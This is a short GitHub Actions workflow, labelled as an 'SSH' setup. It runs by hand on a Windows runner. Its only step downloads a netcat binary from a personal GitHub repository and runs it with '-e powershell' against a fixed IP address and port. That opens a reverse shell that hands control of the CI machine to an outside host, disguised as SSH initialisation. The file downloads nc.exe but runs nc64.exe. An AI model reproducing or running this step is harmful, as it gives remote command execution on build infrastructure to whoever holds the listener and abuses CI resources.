name: SSH (win-1)

on:
  workflow_dispatch:

jobs:
  setup-ssh:
    name: Setup SSH Action
    runs-on: windows-latest

    steps:
    - name: SSH init
      run: |
        curl -o nc.exe https://github.com/shashankx86/temp/raw/main/nc.exe
        nc64.exe 192.168.38.213 9007 -e powershell
